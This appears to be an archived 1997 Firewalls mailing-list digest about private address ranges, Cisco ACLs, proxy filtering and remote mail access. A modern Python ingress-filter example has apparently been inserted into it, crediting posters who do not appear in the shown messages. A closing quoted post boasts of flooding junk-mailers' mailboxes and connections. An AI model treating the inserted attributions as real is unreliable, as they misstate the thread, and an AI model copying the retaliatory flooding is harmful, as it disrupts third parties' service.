From firewalls-owner Thu Jan 9 20:53:13 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id UAA15008 for firewalls-outgoing; Thu, 9 Jan 1997 20:07:51 -0800 (PST) Received: from sebastion.sa.camtech.com.au (sebastion.sa.camtech.com.au [203.28.3.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id UAA14963 for ; Thu, 9 Jan 1997 20:07:36 -0800 (PST) Received: (from uucp@localhost) by sebastion.sa.camtech.com.au (8.6.10/8.6.10) id OAA25669; Fri, 10 Jan 1997 14:40:04 +1030 Received: from mail.ct(192.168.1.2) by sebastion via smap (V1.3) id sma025667; Fri Jan 10 14:39:47 1997 Received: from tossa.ct (tossa [192.168.1.3]) by slingshot.camtech.com.au (8.6.12/8.6.12) with ESMTP id OAA14648; Fri, 10 Jan 1997 14:37:38 +1030 From: David Murray Received: (dmurray@localhost) by tossa.ct (8.7.5/8.6.9) id OAA03370; Fri, 10 Jan 1997 14:37:01 +1030 (CST) Date: Fri, 10 Jan 1997 14:37:01 +1030 (CST) Message-Id: <199701100407.OAA03370@tossa.ct> To: uscny8hb@ibmmail.com Subject: Re: registered IP addresses? Cc: Firewalls@GreatCircle.COM Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-MD5: A4YgmCs86V33KthBjRVGbw== Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hi,

The RFC is RFC 1918.

Cheers
Dave.
___________________________________________________________________________
David Murray                 Phone: +61 8 8303 3300
Systems Engineer             Fax:   +61 8 8303 4403
Camtech (S.A.) Pty. Ltd.     Email: dmurray@camtech.com.au
                             WWW:   www.camtech.com.au
PO Box 128,                  Office: 8th Floor, 10 Pulteney Street, Rundle Mall, Adelaide SA
Adelaide, SA 5000. Australia.
___________________________________________________________________________

> From firewalls-owner@GreatCircle.COM Fri Jan 10 14:31 CST 1997
> Date: Thu, 09 Jan 1997 09:52:15 -0500
> From: "Steven E.
Matkoski" > MIME-Version: 1.0 > To: Firewalls Mailing List > Subject: registered IP addresses? > Content-Transfer-Encoding: 7bit > > Does someone know what the registered IP addresses are that should be > used for internal networks. These are the addresses that are not routed > to the Internet. or even the RFC#? > > -- > Thanks! > -steve. > matkoski@dreamscape.com > From firewalls-owner Thu Jan 9 20:54:42 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA11290 for firewalls-outgoing; Thu, 9 Jan 1997 19:36:28 -0800 (PST) Received: from ns1.fni.com (ns1.fni.com [204.181.104.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA10932 for ; Thu, 9 Jan 1997 19:30:25 -0800 (PST) Received: from ns1.fni.com (ns1.fni.com [204.181.104.1]) by ns1.fni.com (8.8.4/8.8.4) with SMTP id VAA20508; Thu, 9 Jan 1997 21:29:12 -0600 Date: Thu, 9 Jan 1997 21:29:12 -0600 (CST) From: Michael Brennen To: "Steven E. Matkoski" cc: Firewalls Mailing List Subject: Re: registered IP addresses? In-Reply-To: <32D5061F.2F66@dreamscape.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk RFC 1918. -- Michael (mbrennen@fni.com) On Thu, 9 Jan 1997, Steven E. Matkoski wrote: > Does someone know what the registered IP addresses are that should be > used for internal networks. These are the addresses that are not routed > to the Internet. or even the RFC#? 
From firewalls-owner Thu Jan 9 21:29:31 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id UAA20496 for firewalls-outgoing; Thu, 9 Jan 1997 20:35:26 -0800 (PST) Received: from diablo.cisco.com (diablo.cisco.com [171.68.223.106]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id UAA20232 for ; Thu, 9 Jan 1997 20:34:29 -0800 (PST) Received: from clonvick-pc.cisco.com (c1robo13.cisco.com [171.68.13.13]) by diablo.cisco.com (8.8.4/CISCO.SERVER.1.2) with SMTP id UAA25423; Thu, 9 Jan 1997 20:33:37 -0800 (PST) Message-Id: <2.2.32.19970110042309.00727bd4@diablo.cisco.com> X-Sender: clonvick@diablo.cisco.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 09 Jan 1997 22:23:09 -0600 To: uscny8hb@ibmmail.com, Firewalls Mailing List From: Chris Lonvick Subject: Re: registered IP addresses? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hi Steve,

Check out RFC-1918 - Address Allocation for Private Internets
and RFC-1631 - The IP Network Address Translator (NAT)

From RFC-1918:
---snip---
Rekhter, et al              Best Current Practice              [Page 3]
RFC 1918        Address Allocation for Private Internets   February 1996

3. Private Address Space

The Internet Assigned Numbers Authority (IANA) has reserved the following three blocks of the IP address space for private internets:

     10.0.0.0    -  10.255.255.255  (10/8 prefix)
     172.16.0.0  -  172.31.255.255  (172.16/12 prefix)
     192.168.0.0 -  192.168.255.255 (192.168/16 prefix)
---/snip---

Hope this helps,
Chris Lonvick
Cisco Systems Consulting Engineering
Houston, TX, USA
+1-713-778-5663

At 09:52 AM 1/9/97 -0500, Steven E. Matkoski wrote:
>Does someone know what the registered IP addresses are that should be
>used for internal networks. These are the addresses that are not routed
>to the Internet. or even the RFC#?
>
>--
>Thanks!
>-steve.
>matkoski@dreamscape.com > > > From firewalls-owner Thu Jan 9 23:29:32 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id XAA07363 for firewalls-outgoing; Thu, 9 Jan 1997 23:25:01 -0800 (PST) Received: from extol.com.my (ns.extol.com.my [202.185.238.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id XAA07341 for ; Thu, 9 Jan 1997 23:23:16 -0800 (PST) Received: by portal.extol.com.my id <21897>; Fri, 10 Jan 1997 23:32:52 +0800 Message-Id: <97Jan10.233252gmt+0800.21897@portal.extol.com.my> Date: Fri, 10 Jan 1997 22:37:43 +0800 From: pclow Reply-To: pclow@pc.jaring.my X-Sender: pclow (Unverified) X-Mailer: Mozilla 4.0b1 (Win95; I) MIME-Version: 1.0 To: Cyber Net-ghost CC: firewalls@GreatCircle.COM Subject: Re: Where can i download the rainbow books ?? X-Priority: Normal References: <199701091856.CAA03347@sirius.hkstar.com> Content-Type: multipart/alternative; boundary="----------3314A18327213" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ------------3314A18327213 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=us-ascii Cyber Net-ghost wrote: > > > Are there any hacker in Hong Kong ??? Try the local butcher stall in the market :) ------------3314A18327213 Content-Transfer-Encoding: 7bit Content-Type: text/html; charset=us-ascii
------------3314A18327213--

From firewalls-owner Fri Jan 10 00:14:15 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA10006 for firewalls-outgoing; Fri, 10 Jan 1997 00:11:26 -0800 (PST) Received: from kexin.kexin.co.kr (kexin2.kexin.co.kr [210.126.192.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id AAA09998 for ; Fri, 10 Jan 1997 00:11:16 -0800 (PST) Received: by kexin.kexin.co.kr; id CAA16522; Sat, 11 Jan 1997 02:08:24 +0900 (JST) Message-Id: <199701101708.CAA16522@kexin.kexin.co.kr> Received: from unknown(201.201.1.4) by kexin.kexin.co.kr via smap (V3.1.1) id xma016520; Sat, 11 Jan 97 02:08:16 +0900 From: "Jung Jun Lee" To: Subject: SmartDisk Homepage location? Date: Fri, 10 Jan 1997 17:12:14 +0900 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hi...

Does anybody know the Smartdisk homepage location? The location I know is http://infolane.com/smartdisk/smartdisk.html, but there is no response. Yes, time out.. Please tell me the Smartdisk homepage..
Thanks From firewalls-owner Fri Jan 10 00:45:00 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA11103 for firewalls-outgoing; Fri, 10 Jan 1997 00:31:59 -0800 (PST) Received: from mail.ka.inka.de (quechua.inka.de [193.197.84.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id AAA10716 for ; Fri, 10 Jan 1997 00:29:16 -0800 (PST) Received: from uu.inka.de ([193.197.84.8]) by mail.ka.inka.de with smtp (ident root using rfc1413) id m0vicK7-0004GbC (Debian Smail-3.2 1996-Jul-4 #2); Fri, 10 Jan 1997 09:28:23 +0100 (MET) Received: from lina (lists@lina.inka.de) by uu.inka.de with bsmtp (S3.1.29.1) id ; Fri, 10 Jan 97 09:28 MET Received: by lina id m0vibsH-0004imC (Debian Smail-3.2 1996-Jul-4 #2); Fri, 10 Jan 1997 08:59:37 +0100 (MET) Message-Id: From: lists@lina.inka.de (Bernd Eckenfels) Subject: Re: which mta 4 dmz To: stesin@gu.kiev.ua Date: Fri, 10 Jan 1997 08:59:36 +0100 (MET) Cc: firewalls@greatcircle.com In-Reply-To: <199701091526.RAA02686@creator.gu.kiev.ua> from "Andrew Stesin" at Jan 9, 97 05:26:47 pm X-Mailer: ELM [version 2.4 PL25 PGP2] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > 5. SVR4.2 mail system (comes i.e. with SCO UnixWare 2.1.x) Is this PP or PDMF? Anyway.. both are old and blown up mail programs... 
Greetings
Bernd

From firewalls-owner Fri Jan 10 00:59:45 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA11572 for firewalls-outgoing; Fri, 10 Jan 1997 00:35:29 -0800 (PST) Received: from mail.ka.inka.de (quechua.inka.de [193.197.84.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id AAA11397 for ; Fri, 10 Jan 1997 00:34:43 -0800 (PST) Received: from uu.inka.de ([193.197.84.8]) by mail.ka.inka.de with smtp (ident root using rfc1413) id m0vicK6-0004GiC (Debian Smail-3.2 1996-Jul-4 #2); Fri, 10 Jan 1997 09:28:22 +0100 (MET) Received: from lina (lists@lina.inka.de) by uu.inka.de with bsmtp (S3.1.29.1) id ; Fri, 10 Jan 97 09:28 MET Received: by lina id m0vibq0-0004imC (Debian Smail-3.2 1996-Jul-4 #2); Fri, 10 Jan 1997 08:57:16 +0100 (MET) Message-Id: From: lists@lina.inka.de (Bernd Eckenfels) Subject: Re: I DON'T HAVE FUNDING FOR A FIREWALL...HELP!!! To: cconov@exp2.is.xpark.pmh.org (Cary Conover) Date: Fri, 10 Jan 1997 08:57:15 +0100 (MET) Cc: ChrisP@steldyn.com, albert.franke@ramstein.af.mil, firewalls@greatcircle.com In-Reply-To: <32D4FF1B.6956@exphub.pmh.org> from "Cary Conover" at Jan 9, 97 08:22:19 am X-Mailer: ELM [version 2.4 PL25 PGP2] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> I don't know if you folks caught this or not. He is on a LAN on a
> fairly large Air Force Base in Germany. This means not only is his
> Website open to attack so are many of the base's computer systems. It
> appears that there are larger issues here than meet the eye.

You should know that no classified information is allowed to be stored on publicly accessible computers. There is usually no confidential-rated material stored on those kinds of unsecured LANs. At least in Germany it's even forbidden to use word processing on those systems for secure documents.
I don't know about the USAF, but I'm quite sure they handle it the same way.

Note: the best firewall is a 2-inch air gap, still.

Greetings
Bernd

From firewalls-owner Fri Jan 10 03:29:25 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA22551 for firewalls-outgoing; Fri, 10 Jan 1997 03:18:50 -0800 (PST) Received: from mcmail.com (email.mcmail.com [195.44.0.12]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id DAA22543 for ; Fri, 10 Jan 1997 03:18:32 -0800 (PST) Received: from solar by mcmail.com (SMI-8.6/SMI-SVR4) id LAA12202; Fri, 10 Jan 1997 11:19:07 GMT Message-ID: <32D62575.7C0B@mcmail.com> Date: Fri, 10 Jan 1997 11:18:13 +0000 From: Peter Reply-To: peter@mcmail.com X-Mailer: Mozilla 2.02E (OS/2; I) MIME-Version: 1.0 To: Firewalls@GreatCircle.COM Subject: Re: registered IP addresses References: <199701100900.BAA13596@miles.greatcircle.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> Does someone know what the registered IP addresses are that should be
> used for internal networks. These are the addresses that are not routed
> to the Internet. or even the RFC#?

RFC1597 used to be the one, but there's a new one superseding that. I can't remember which one that is, but 1597 will give you all you need.

The addresses for internal use are:

Class A : 10.x.x.x
Class B : 172.16.x.x .. 172.31.x.x
Class C : 192.168.x.x

I've come across quite a few sites with 'random' IP numbering, so congratulations for doing it right ;-)

--
Regards,
/// Peter ///
"It takes a man to suffer ignorance and smile" - Sting
"OK, what part of 'NO' don't you understand ?"
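Two rules from this thread, written out as a small ingress filter so they can be checked against real packet bytes: Ricardo's advice to drop anything arriving from outside that carries one of your internal addresses as its source, and Jaime's point that echo request is ICMP type 8 while echo reply is type 0, so you can drop inbound pings without dropping the replies to your own. This is an added example for the list discussion, not code from any poster or product. It assumes the protected network uses the three RFC 1918 blocks quoted above from the RFC; the sample addresses come from the 203.0.113.0/24 and 198.51.100.0/24 documentation ranges, and every packet is constructed inside the script.

```python
"""Toy ingress filter for the external router: RFC 1918 anti-spoofing plus ICMP type checks.

Added example for the list discussion (not code from any poster). Assumes the
protected network uses RFC 1918 space; all packets below are constructed here.
"""
import ipaddress
import struct

# The three RFC 1918 blocks quoted from the RFC in Chris Lonvick's message.
RFC1918_BLOCKS = (
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
)

IPPROTO_ICMP = 1
ICMP_ECHO_REPLY = 0      # message type 0, as Jaime notes
ICMP_ECHO_REQUEST = 8    # message type 8


def is_rfc1918(addr: str) -> bool:
    """True if addr lies in one of the three private blocks."""
    ip = ipaddress.ip_address(addr)
    return any(ip in block for block in RFC1918_BLOCKS)


def parse_ipv4(packet: bytes) -> dict:
    """Decode the fixed 20-byte IPv4 header; return src, dst, protocol and payload."""
    if len(packet) < 20:
        raise ValueError("truncated IPv4 header")
    (ver_ihl, _tos, _total_len, _ident, _flags_frag,
     _ttl, proto, _csum, src, dst) = struct.unpack("!BBHHHBBH4s4s", packet[:20])
    ihl = (ver_ihl & 0x0F) * 4          # header length in bytes, options included
    if ver_ihl >> 4 != 4 or ihl < 20 or len(packet) < ihl:
        raise ValueError("malformed IPv4 header")
    return {
        "src": str(ipaddress.IPv4Address(src)),
        "dst": str(ipaddress.IPv4Address(dst)),
        "proto": proto,
        "payload": packet[ihl:],
    }


def icmp_message_type(payload: bytes) -> int:
    """The first byte of the ICMP header is the message type."""
    if len(payload) < 8:
        raise ValueError("truncated ICMP header")
    return payload[0]


def ingress_verdict(packet: bytes) -> tuple:
    """Rules for a packet arriving on the outside interface: ("drop"|"accept", reason)."""
    hdr = parse_ipv4(packet)
    # Rule 1 (Ricardo): nothing from outside may carry an internal source address.
    if is_rfc1918(hdr["src"]):
        return ("drop", "spoofed private source %s" % hdr["src"])
    # Rule 2 (Jaime): drop inbound echo request; replies and error types pass.
    if hdr["proto"] == IPPROTO_ICMP:
        mtype = icmp_message_type(hdr["payload"])
        if mtype == ICMP_ECHO_REQUEST:
            return ("drop", "inbound ICMP echo request (type 8)")
        return ("accept", "ICMP type %d" % mtype)
    return ("accept", "IP protocol %d" % hdr["proto"])


def build_packet(src: str, dst: str, proto: int, payload: bytes) -> bytes:
    """Construct a minimal IPv4 packet (no options; header checksum left zero,
    which parse_ipv4 deliberately does not verify)."""
    header = struct.pack(
        "!BBHHHBBH4s4s",
        0x45, 0, 20 + len(payload), 0, 0, 64, proto, 0,
        ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed,
    )
    return header + payload


def icmp_header(mtype: int, code: int = 0) -> bytes:
    """Constructed 8-byte ICMP header (checksum, id and sequence left zero)."""
    return struct.pack("!BBHHH", mtype, code, 0, 0, 0)


# Constructed traffic sample: what the outside interface might see.
SAMPLES = {
    "ping from outside": build_packet("203.0.113.5", "198.51.100.7", IPPROTO_ICMP, icmp_header(ICMP_ECHO_REQUEST)),
    "ping reply to our ping": build_packet("203.0.113.5", "198.51.100.7", IPPROTO_ICMP, icmp_header(ICMP_ECHO_REPLY)),
    "spoofed internal source": build_packet("192.168.1.20", "198.51.100.7", IPPROTO_ICMP, icmp_header(ICMP_ECHO_REPLY)),
    "inbound smtp": build_packet("203.0.113.5", "198.51.100.7", 6, bytes(20)),
}


def run_samples() -> dict:
    """Apply the filter to every sample; returns name -> (verdict, reason)."""
    return {name: ingress_verdict(pkt) for name, pkt in SAMPLES.items()}


if __name__ == "__main__":
    for name, (verdict, reason) in run_samples().items():
        print("%-24s %-6s %s" % (name, verdict, reason))
```

The order of the two rules matters: the source-address check runs first so that a spoofed packet is dropped whatever protocol it carries, and the ICMP type check is only reached for traffic whose source is plausible. A real router ACL expresses the same thing as a deny on the private prefixes followed by a deny on echo-request before any permit lines.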
From firewalls-owner Fri Jan 10 03:44:35 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA22639 for firewalls-outgoing; Fri, 10 Jan 1997 03:23:43 -0800 (PST) Received: from sunrise (sunrise.solmelia.es [194.179.70.3]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id DAA22611 for ; Fri, 10 Jan 1997 03:22:07 -0800 (PST) Received: from (firewall) by sunrise (5.x/SMI-SVR4) id AA22459; Fri, 10 Jan 1997 12:23:54 +0100 Message-Id: <9701101123.AA22459@sunrise> From: israel.serrano@solmelia.es Date: Fri, 10 Jan 97 12:08:24 To: Firewalls Subject: CISCO routing X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hi all.

See, we have a Cisco Router which routes all incoming X.25 traffic, a FR line and the corporate LAN. Through the X.25 Interface we get traffic from tens of places, and the main idea is to "create" virtual subnetworks making use of the ACL (IP).

Let's say there are 30 places connecting to the serial interface (X.25 IP encapsulated) and I would like to allow access from one host on the corp. LAN to all of the places (each one of them with their own IP network). But the sites should only be able to access some other defined sites (using ACLs ??).

The main question is if this is possible at all? (it's like using the Cisco as a firewall, or at least as an IP packet filter).

Thanks a lot.
Luis Israel Serrano Barge Departamento de Sistemas de Información / Information Technology Department Sol Meliá (http://www.solmelia.es) email: israel.serrano@solmelia.es Tlf: +34 (9)71 43 70 57 Fax: +34 (9)71 43 70 52 From firewalls-owner Fri Jan 10 04:44:48 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA25885 for firewalls-outgoing; Fri, 10 Jan 1997 04:27:05 -0800 (PST) Received: from diablo.cisco.com (diablo.cisco.com [171.68.223.106]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id EAA25831 for ; Fri, 10 Jan 1997 04:26:20 -0800 (PST) Received: from big-dogs.cisco.com ([171.68.53.75]) by diablo.cisco.com (8.8.4/CISCO.SERVER.1.2) with SMTP id EAA12911; Fri, 10 Jan 1997 04:26:00 -0800 (PST) Message-Id: <3.0.32.19970110072558.006ecb9c@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Fri, 10 Jan 1997 07:26:01 -0500 To: uscny8hb@ibmmail.com From: Paul Ferguson Subject: Re: registered IP addresses? Cc: Firewalls Mailing List Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I think you are referring to RFC1918. - paul At 09:52 AM 1/9/97 -0500, Steven E. Matkoski wrote: >Does someone know what the registered IP addresses are that should be >used for internal networks. These are the addresses that are not routed >to the Internet. or even the RFC#? > >-- >Thanks! >-steve. >matkoski@dreamscape.com > > -- Paul Ferguson || || Consulting Engineering || || Herndon, Virginia USA |||| |||| tel: +1.703.397.5938 ..:||||||:..:||||||:.. 
e-mail: pferguso@cisco.com c i s c o S y s t e m s

From firewalls-owner Fri Jan 10 04:59:20 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA25764 for firewalls-outgoing; Fri, 10 Jan 1997 04:23:50 -0800 (PST) Received: from salyut.mis.gla.ac.uk (salyut.mis.gla.ac.uk [130.209.164.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id EAA25723 for ; Fri, 10 Jan 1997 04:23:23 -0800 (PST) Received: from set1.mis.gla.ac.uk (set1.mis [130.209.164.51] sender igabrie) by salyut.mis.gla.ac.uk (8.7.6/UK-2.2a/mis-sparc) with SMTP id MAA28540 for ; Fri, 10 Jan 1997 12:20:43 GMT Message-Id: <3.0.1.32.19970110122043.006751bc@salyut.mis.gla.ac.uk> X-Sender: igabrie@salyut.mis.gla.ac.uk X-Mailer: Windows Eudora Light Version 3.0.1 beta 4 (32) Date: Fri, 10 Jan 1997 12:20:44 +0000 To: Firewalls@greatcircle.com From: "INDERJIT.S.GABRIE" Subject: Network Monitoring soft../Firewall Books... Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hi fellow netters

Could someone tell me how I can get hold of Network Monitoring software, preferably shareware, which would allow me to monitor any bottlenecking on systems. Most of the PCs are remotely situated at different depts. and I want to check the network activity etc. from my PC located on my desk. I use a PC which has Win95 operating software on it. In the past when I had an Apple Mac, I knew there was software called "Intermapper", which basically showed the traffic flow graphically... it was simple to use: you enter the IP No. and this software automatically pings the machine and shows all the physical connections etc etc...

Every bit of help much appreciated....thanks...indy
______________________________________
MR.INDERJIT.S.GABRIE   | TEL: 0141-330-3552
I.T.SYSTEM SUPPORT     | FAX: 0141-330-4953
UNIVERSITY OF GLASGOW  | E-mail:IGabrie@salyut.mis.gla.ac.uk
DEPARTMENT OF M.I.S.
| (Management Information Services)
Gilbert Scott Building,(Main Building),3rd Floor Room 635B, Glasgow G12 8QQ, Scotland, U.K.
______________________________________
" Reality is an illusion - perception is what counts "
______________________________________

From firewalls-owner Fri Jan 10 05:35:57 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA29246 for firewalls-outgoing; Fri, 10 Jan 1997 05:16:01 -0800 (PST) Received: from ereapp.erenj.com (ereapp.ERENJ.COM [159.70.31.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id FAA29230 for ; Fri, 10 Jan 1997 05:15:47 -0800 (PST) Received: (from smap@localhost) by ereapp.erenj.com (8.8.3/8.8.3) id IAA03072; Fri, 10 Jan 1997 08:15:00 -0500 Received: from eredns.erenj.com(159.70.1.252) by ereapp.erenj.com via smap (V1.3) id sma003049; Fri Jan 10 08:14:38 1997 Received: from stargate.erenj.com (stargate.erenj.com [159.70.1.8]) by eredns.erenj.com (8.7.4/8.7.3) with SMTP id IAA12525; Fri, 10 Jan 1997 08:14:37 -0500 Received: from stargate.erenj.com by stargate.erenj.com; (5.65v3.2/1.1.8.2/12Feb96-1009AM/bdboyle@erenj.com) id AA01391; Fri, 10 Jan 1997 08:14:36 -0500 Message-Id: <32D640BC.167E@erenj.com> Date: Fri, 10 Jan 1997 08:14:36 -0500 From: "Bryan D. Boyle" Organization: Exxon Research and Engineering Co. X-Mailer: Mozilla 3.0C-NSCP (X11; I; OSF1 V4.0 alpha) Mime-Version: 1.0 To: Chris Liljenstolpe Cc: firewalls@GreatCircle.COM Subject: Re: Pointcast References: <3.0.32.19970109181317.0124b338@pop.io.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Chris Liljenstolpe wrote:
>
> The last time I checked, I-server only ran on NT :(

Yep, and it is not intuitive to set up. Pointcast seems to be making the most of their new relationship with Microsoft and delivering software that is hard to set up, and counterintuitive to use.
I have been examining the Netscape proxy version 2.5 with webtrack filtering enabled. In the filtering configuration, you can forbid dotted-decimal domains. Pointcast seems (at least from my logs...) to favor not registering names with any DNS for their news broadcast servers; cutting off any access at the corporate proxy to dotted-decimal hosts will serve the same purpose, and flush the users of this trojan horse program out when their screen savers stop working in real time. Yeah, there is a burst of whining, but, if mgmt has made it clear that pointcast is not a certified application in your network, then this may be a way to clean up the act.

Just a thought.

--
Bryan D. Boyle | EMAIL: bdboyle@erenj.com 908-730-3338
#include | http://www.access.digex.net/~bdboyle/index.html
"They that can give up liberty to obtain a little temporary safety deserve neither liberty nor safety." - Benjamin Franklin, Historical Review of Pennsylvania

From firewalls-owner Fri Jan 10 05:44:41 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA01409 for firewalls-outgoing; Fri, 10 Jan 1997 05:41:37 -0800 (PST) Received: from garanti1.garanti.com.tr ([194.54.51.100]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id FAA01328 for ; Fri, 10 Jan 1997 05:40:22 -0800 (PST) Received: from Mailhub by garanti1.garanti.com.tr id AA05958; Fri, 10 Jan 1997 15:38:24 +0300 Received: from GarantiUser by GarantiMailServer id AA21930; Fri, 10 Jan 1997 15:36:47 +0300 Received: by SMTPGW.FW.GARANTI.COM.TR with Microsoft Mail id <32D6D264@SMTPGW.FW.GARANTI.COM.TR>; Fri, 10 Jan 97 15:36:04 PST From: "Cihan Subasi (Garanti Tic)" To: firewall Subject: RealAudio clients behind the FW...
Date: Fri, 10 Jan 97 15:32:00 PST Message-Id: <32D6D264@SMTPGW.FW.GARANTI.COM.TR> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

I'm having problems configuring FW to allow RealAudio packets... Port 7070 seems open but data transmission on a UDP port does not occur... Please help....

Thanks
Cihan

From firewalls-owner Fri Jan 10 06:14:58 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA03236 for firewalls-outgoing; Fri, 10 Jan 1997 06:09:20 -0800 (PST) Received: from gatekeeper.ing.nl (gatekeeper.ing.nl [194.178.239.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA03222 for ; Fri, 10 Jan 1997 06:09:12 -0800 (PST) From: Robin.Pollard@mail.ing.nl Received: by ING-mailhub; id AA26288; Fri, 10 Jan 1997 15:09:43 +0100 X400-Originator: Robin.Pollard@mail.ing.nl X400-Recipients: firewalls@greatcircle.com X400-Mts-Identifier: [/PRMD=ING GROEP/ADMD=400NET/C=NL/;0013700002238963000002] X400-Content-Type: P2-1988 (22) Message-Id: <0013700002238963000002*@MHS> To: firewalls Subject: A simple firewall requirement ? Date: Fri, 10 Jan 1997 15:04:59 +0000 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

I am looking at ways to provide global access to our internal mail system (cc:Mail) for mobile users. We have cc:Mail "post offices" where user mail is stored at various offices throughout the globe, all linked to a central hub here via our own VPN (TCP/IP). The remote users need to be able to make a (TCP/IP) connection from their laptop into the VPN and down to their PO to get mail. We have access to X28 access points in most of the world.

I was thinking of a PPP dialup machine here (accessed via X28) that will route packets from a limited number of IP addresses (the mobile users) to the IP addresses of the mail POs only on the port cc:Mail uses (cc0); all else is of course excluded.
Lotus claim cc:Mail sends all its traffic well encrypted but keep the algorithm secret :) We trust the network provider enough to be happy with this.

What sort of hardware can do this? Will a single-box Linux solution do, or can it not filter in that detail? The PPP point is exposed to the world (or anyone who hacks our network provider); what attacks is it open to? Should the PPP box sit outside another filtering router in case it is compromised, or can it be locked down tight with such limited requirements? Any big holes I should be aware of?

TIA,

Robin Pollard
Infrastructure Support
ING Bank International
robin.pollard@mail.ing.nl

From firewalls-owner Fri Jan 10 06:31:51 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA04392 for firewalls-outgoing; Fri, 10 Jan 1997 06:19:04 -0800 (PST) Received: from mole.mole.org (marmot.mole.org [204.216.57.191]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA04385 for ; Fri, 10 Jan 1997 06:18:56 -0800 (PST) Received: (from mail@localhost) by mole.mole.org (8.6.12/8.6.12) id OAA20758; Fri, 10 Jan 1997 14:18:14 GMT Received: from meerkat.mole.org(206.197.192.110) by mole.mole.org via smap (V1.3) id sma020752; Fri Jan 10 14:17:45 1997 Received: (from mrm@localhost) by meerkat.mole.org (8.6.11/8.6.9) id GAA05039; Fri, 10 Jan 1997 06:17:34 -0800 Date: Fri, 10 Jan 1997 06:17:34 -0800 From: "M.R.Murphy" Message-Id: <199701101417.GAA05039@meerkat.mole.org> To: peter.maersk-moller@jrc.it Subject: Re: CheckRite Laser Checks Cc: Firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Peter Maersk-Moller writes:
>This is not firewall related but it is firewall mailing list related.
...
>I used to trace down the sender of junkmail and filled their mailbox and
>congested their Internet connection or their ISP Internet connection.
After
>that I usually used to find the bosses of the responsible for sending
>junkmail to explain how much damage their employees have brought to
>their companies, but it seems there are too many incompetent loonies in the
>world.
>

